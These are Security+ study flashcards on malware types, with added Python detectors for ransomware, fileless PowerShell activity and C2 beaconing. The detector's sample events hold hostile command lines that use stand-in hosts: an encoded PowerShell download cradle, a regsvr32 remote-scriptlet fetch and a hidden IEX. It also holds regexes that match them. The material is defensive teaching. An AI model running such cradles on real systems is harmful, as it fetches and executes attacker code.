1.2 Given a scenario, analyze potential indicators to determine the type of attack. Flashcards
Malware
software that is specifically designed to disrupt, damage, or gain unauthorized access to a computer system.
Ransomware
Cryptoviral malware that threatens to publish the victim's data or permanently block access to it unless a ransom is paid. Simple variants only lock the screen or system without touching any files; more advanced variants use a technique called cryptoviral extortion: they encrypt the victim's files, making them inaccessible, and demand payment for the decryption key. In a properly implemented cryptoviral extortion attack, recovering the files without the key is computationally infeasible, and hard-to-trace payment methods such as Paysafecard, Bitcoin and other cryptocurrencies are used, making it difficult to trace and prosecute the perpetrators. Paying does not guarantee that the data will be fully restored, nor does it stop the threat actor from leaking data exfiltrated before encryption (double extortion) on the dark web. Typical indicators on a host: a burst of file modifications and renames to a new extension, ransom notes dropped into every directory, and deletion of volume shadow copies or backups.
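One host-side check for the "files suddenly look like ciphertext" indicator described above, written as an added example for these flashcards (it is not taken from any product or from the original page): it measures the Shannon entropy of each file's first bytes and combines that with a ransomware-style extension. The extension list, the 7.5 bits/byte threshold and the sample directory it builds are constructed for the example.

```python
import math
import os
import tempfile
from collections import Counter
from pathlib import Path

# Extensions commonly appended by file-encrypting ransomware. Illustrative list
# for this example; a real detection would draw on threat-intel feeds.
SUSPICIOUS_EXTENSIONS = {".locked", ".encrypted", ".crypt", ".enc"}
ENTROPY_THRESHOLD = 7.5  # bits per byte; well-encrypted or random data approaches 8.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty or single-valued input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def assess_file(path: Path, sample_size: int = 4096) -> dict:
    """Indicators for one file: entropy of its head and whether its extension is suspicious."""
    with path.open("rb") as fh:
        head = fh.read(sample_size)
    ent = shannon_entropy(head)
    return {
        "path": str(path),
        "entropy": round(ent, 3),
        "high_entropy": ent >= ENTROPY_THRESHOLD,
        "suspicious_extension": path.suffix.lower() in SUSPICIOUS_EXTENSIONS,
    }


def flag_ransomware_indicators(directory: Path) -> list:
    """Return paths showing both a high-entropy body and a ransomware-style extension.

    Entropy alone also fires on legitimate compressed or encrypted files (zip, jpg,
    pdf), which is why the two indicators are required together.
    """
    flagged = []
    for path in sorted(directory.rglob("*")):
        if path.is_file():
            info = assess_file(path)
            if info["high_entropy"] and info["suspicious_extension"]:
                flagged.append(info["path"])
    return flagged


def build_sample_tree() -> Path:
    """Constructed test data: two plain documents and two 'encrypted' copies."""
    root = Path(tempfile.mkdtemp(prefix="rw_demo_"))
    (root / "notes.txt").write_bytes(b"quarterly report draft, revision 3\n" * 200)
    (root / "config.ini").write_bytes(b"[main]\nenabled=true\nretries=5\n" * 100)
    # os.urandom stands in for ciphertext: a correctly encrypted file is
    # indistinguishable from random bytes, so its entropy sits near 8 bits/byte.
    (root / "notes.txt.locked").write_bytes(os.urandom(8192))
    (root / "config.ini.encrypted").write_bytes(os.urandom(8192))
    return root


if __name__ == "__main__":
    for hit in flag_ransomware_indicators(build_sample_tree()):
        print("ransomware indicator:", hit)
```

In production this kind of check is paired with rename-rate telemetry and canary files rather than run as a one-off scan, because by the time a directory scan finds high-entropy files the encryption has usually already happened.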
Trojan Horse and Remote Access Trojan (RAT)
Malware that is a file, program, or piece of code that appears legitimate and safe but is actually malicious. Trojans are usually packaged with and delivered inside legitimate-looking software, and they are often designed to spy on victims or steal data; many also download additional malware once installed. A Remote Access Trojan (RAT) goes further and gives the attacker remote control of the infected host.
Potentially unwanted programs (PUPs)
A program that may be unwanted even though the user technically consented to download it. Includes adware, spyware, dialers and bloatware; PUPs are often bundled with a program the user actually wants and installed alongside it.
Fileless Malware
A type of malicious activity that abuses native, legitimate tools already on the system (for example PowerShell, WMI, or the Windows registry) to carry out an attack. Unlike traditional malware, it does not need to drop a malicious executable on disk, which makes it hard for file-based antivirus to detect.
- A stealth attack: avoids signature-based anti-virus, which scans files on disk.
- Runs in memory rather than as an installed file or application; if it persists at all, it typically does so through registry entries, scheduled tasks, or WMI subscriptions rather than a dropped binary, so process command lines and script-host telemetry are the main indicators.
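Because fileless attacks leave little on disk, the indicators live in process-creation telemetry: which process spawned a script host and what its command line contained. The following is an added example for these flashcards, not code from the original page or from any product: it scores constructed process-creation events (in the style of Sysmon Event ID 1 / Windows 4688) against a handful of well-known PowerShell and LOLBin indicators, decoding any -EncodedCommand payload first so the indicators can be applied to what actually runs. The indicator regexes, weights, threshold and sample events are all assumptions made for the example.

```python
import base64
import re

# Constructed process-creation events: (parent image, image, command line). Not real telemetry.
ENCODED_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
ENCODED_B64 = base64.b64encode(ENCODED_PAYLOAD.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe",
     "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"),
    ("winword.exe", "powershell.exe",
     "powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED_B64),
    ("cmd.exe", "regsvr32.exe",
     "regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll"),
    ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ("wmiprvse.exe", "powershell.exe",
     "powershell.exe -nop -w hidden -c \"IEX ([Text.Encoding]::ASCII.GetString("
     "[Convert]::FromBase64String('Y2FsYw==')))\""),
]

# Indicator catalogue: (name, regex, weight). Patterns and weights are illustrative
# choices for this example, not a published ruleset.
INDICATORS = [
    ("encoded_command", re.compile(r"(?i)-e[a-z]*\s+[A-Za-z0-9+/=]{20,}"), 3),
    ("hidden_window", re.compile(r"(?i)-w(indowstyle)?\s+hidden"), 2),
    ("no_profile", re.compile(r"(?i)-nop(rofile)?\b"), 1),
    ("invoke_expression", re.compile(r"(?i)\b(iex|invoke-expression)\b"), 3),
    ("download_cradle", re.compile(
        r"(?i)(downloadstring|downloadfile|net\.webclient|invoke-webrequest)"), 3),
    ("base64_decode", re.compile(r"(?i)frombase64string"), 2),
    ("regsvr32_scriptlet", re.compile(r"(?i)regsvr32(\.exe)?\b.*\s/i:https?://"), 5),
    ("mshta_remote", re.compile(r"(?i)mshta(\.exe)?\s+(https?:|javascript:|vbscript:)"), 5),
]
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
FLAG_THRESHOLD = 5

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_RE = re.compile(r"(?i)-e[a-z]*\s+([A-Za-z0-9+/=]{20,})")


def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload decoded from base64 + UTF-16LE, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(parent, image, cmdline):
    """Score one event; the decoded payload is scanned alongside the raw command line."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    # An Office application spawning a script host is the classic macro-to-memory pivot.
    if parent.lower() in OFFICE_PARENTS and image.lower() in SCRIPT_HOSTS:
        hits.append("office_parent")
        score += 3
    return {"image": image, "score": score, "indicators": hits,
            "decoded": decoded, "flagged": score >= FLAG_THRESHOLD}


def triage(events):
    """Score every event in order."""
    return [score_event(*e) for e in events]


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        mark = "ALERT" if r["flagged"] else "ok   "
        print(f"{mark} score={r['score']:2d} {r['image']} {r['indicators']}")
        if r["decoded"]:
            print("      decoded:", r["decoded"])
```

The decode step matters more than the regex list: an encoded command hides every other indicator from a plain string match, which is exactly why attackers use it. Obfuscation beyond base64 (string concatenation, tick characters, format operators) defeats this simple scorer, so in practice it is layered with script-block logging and AMSI telemetry rather than used alone.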
Command and control
A computer controlled by an attacker which is used to send commands to systems compromised by malware and to receive stolen data from the target network.
It also serves as the headquarters for the compromised machines in a botnet and can be used to issue commands that steal data, spread malware, disrupt web services, and more. C2 systems used by botnets generally follow one of three models: centralized, peer-to-peer (P2P), or random.
Command and Control: Centralized
Functions much like a traditional client-server relationship: the malware "client" phones home and checks for instructions. In practice, an attacker's server-side infrastructure is often far more complex than a single server and may include redirectors, load balancers, and defensive measures to detect security researchers and law enforcement. Public cloud services and Content Delivery Networks (CDNs) are frequently used to host or mask activity. It is also common for attackers to compromise legitimate websites and use them to host command and control servers without the owner's knowledge.
Command and Control: Peer-To-Peer
Command and control instructions are delivered in a decentralized fashion, with members of the botnet relaying messages between one another. Some bots may still function as servers, but there is no central or "master" node. This makes the botnet far harder to disrupt than a centralized model, but it can also make it harder for the attacker to issue instructions to the entire botnet. P2P networks are sometimes used as a fallback mechanism in case the primary C2 channel is disrupted.
Command and Control: Out of Band and Random
A number of unusual techniques have been observed for issuing instructions to infected hosts. Attackers make extensive use of social media platforms as unconventional C2 channels because such traffic is rarely blocked and blends in with normal web use. A project called Twittor aims to provide a fully functional command and control platform using only direct messages on Twitter. Attackers have also been observed using Gmail, IRC chat rooms, and even Pinterest to issue C2 messages to compromised hosts. It has also been theorized that command and control could be entirely random, with an attacker scanning large swaths of the Internet in the hope of finding an infected host rather than having the implant call home.
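Whatever the model, an implant that polls a centralized server (and, less cleanly, one that polls a social-media or P2P channel) produces a network-side indicator: connections at a near-constant interval with near-constant size. The following beacon check is an added example for these flashcards, not code from the original page or from any tool: it groups constructed proxy/firewall log lines by flow and flags flows whose inter-arrival times and request sizes are too regular to be a person. The log format, the CV thresholds, the minimum connection count and the sample traffic are all assumptions made for the example.

```python
import statistics
from collections import defaultdict

# Thresholds are illustrative. CV = population std dev / mean; 0 means perfectly periodic.
MIN_CONNECTIONS = 10     # fewer than this and regularity is meaningless
INTERVAL_CV_MAX = 0.25   # allows a beacon with modest jitter
SIZE_CV_MAX = 0.10       # check-ins with no tasking are nearly the same size every time


def build_sample_log():
    """Constructed log lines '<epoch> <src> <dst> <port> <bytes_out>' (not real traffic)."""
    lines = []
    # (1) Implant beaconing to 203.0.113.7:443 every ~60 s with small jitter and a
    #     near-constant request size: the classic centralized-C2 check-in.
    jitter = [-4, 3, -1, 5, -5, 2, 0, -3, 4, -2]
    t = 1_700_000_000
    for i in range(40):
        lines.append(f"{t} 10.0.0.5 203.0.113.7 443 {312 + (i % 2)}")
        t += 60 + jitter[i % len(jitter)]
    # (2) Interactive browsing from the same host: irregular gaps and sizes.
    gaps = [3, 120, 7, 2, 400, 15, 1, 90, 5, 600]
    sizes = [800, 15000, 2200, 95000, 430, 6000, 12000, 150, 3300, 70000]
    t = 1_700_000_000
    for i in range(40):
        lines.append(f"{t} 10.0.0.5 198.51.100.20 443 {sizes[i % 10]}")
        t += gaps[i % 10]
    # (3) Two connections exactly 60 s apart: perfectly periodic, but too few to judge.
    lines.append("1700000100 10.0.0.9 192.0.2.33 80 500")
    lines.append("1700000160 10.0.0.9 192.0.2.33 80 500")
    return lines


def parse(lines):
    """Group (timestamp, bytes) by (src, dst, port)."""
    flows = defaultdict(list)
    for line in lines:
        ts, src, dst, port, size = line.split()
        flows[(src, dst, int(port))].append((int(ts), int(size)))
    return flows


def coefficient_of_variation(values):
    """Scale-free regularity measure; inf when the mean is zero."""
    mean = statistics.fmean(values)
    return statistics.pstdev(values) / mean if mean else float("inf")


def find_beacons(lines):
    """Return flows whose timing and size regularity look like automated check-ins."""
    results = []
    for key, events in parse(lines).items():
        if len(events) < MIN_CONNECTIONS:
            continue  # edge case: a handful of hits cannot establish a period
        events.sort()
        gaps = [b[0] - a[0] for a, b in zip(events, events[1:])]
        sizes = [s for _, s in events]
        icv = coefficient_of_variation(gaps)
        scv = coefficient_of_variation(sizes)
        if icv <= INTERVAL_CV_MAX and scv <= SIZE_CV_MAX:
            results.append({"flow": key, "count": len(events),
                            "mean_gap_s": round(statistics.fmean(gaps), 1),
                            "interval_cv": round(icv, 3), "size_cv": round(scv, 3)})
    return results


if __name__ == "__main__":
    for hit in find_beacons(build_sample_log()):
        print("possible beacon:", hit)
```

The weakness of the check is also the reason attackers add jitter and sleep randomization to their implants: the larger the jitter, the closer the interval CV gets to ordinary traffic. Beacons over social media or a CDN additionally hide inside destinations that are allow-listed, so the flow key should be the full URL or SNI, not just the IP, when that telemetry is available.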
Bots and Botnet
A bot is malware that infects a host and connects back to one or more attacker-controlled servers; a botnet is the resulting network of compromised computers and similar devices, with the server(s) acting as its command and control center. Many bots have a worm-like ability to self-propagate, and a bot-infected host can also:
- Gather passwords
- Log keystrokes
- Obtain financial information
- Relay spam
- Capture and analyze packets
- Launch DoS attacks (DDoS when the whole botnet is directed at one target)
- Open back doors on the infected computer
- Exploit back doors opened by viruses and worms
Bots are usually used to infect large numbers of computers in order to grow the network of hosts the attacker can direct at a target.
CryptoMalware
A type of malware that lets threat actors use someone else's computer or server to mine cryptocurrency for them (cryptojacking). Indicators are sustained high CPU or GPU utilization, elevated power consumption and fan noise, and outbound connections to mining pools. Note that some study guides use "cryptomalware" for ransomware that encrypts files; the sense here is cryptojacking.
Logic Bomb
A piece of code intentionally inserted into a software system that triggers a malicious function when specified conditions are met, such as a date, a counter, or the absence of a particular user account. For example, a programmer may hide code that starts deleting files should they ever be terminated from the company. Because the code sits dormant inside otherwise legitimate software, it is found through code review and change control rather than signature scanning.
Spyware
Software with malicious behavior that aims to covertly gather information about a person or organization and send it to another entity in a way that harms the user, for example by violating their privacy or endangering their device's security.
Keyloggers
A program (or a small hardware device placed inline with the keyboard) that records every keystroke a user makes, typically in order to capture passwords and other confidential information. Software keyloggers are a common component of spyware and RATs.
Rootkit
A collection of software, typically malicious, designed to enable access to a computer or an area of its software that would not otherwise be allowed (for example, to an unauthorized user), while masking its own existence or the existence of other software. Because a rootkit subverts the operating system itself (kernel-mode rootkits hook system calls or alter kernel data structures), tools running on the compromised OS cannot be trusted to see it; detection relies on cross-view comparisons (what the API reports versus what the raw disk or memory contains), offline scans from clean boot media, or measured/secure boot.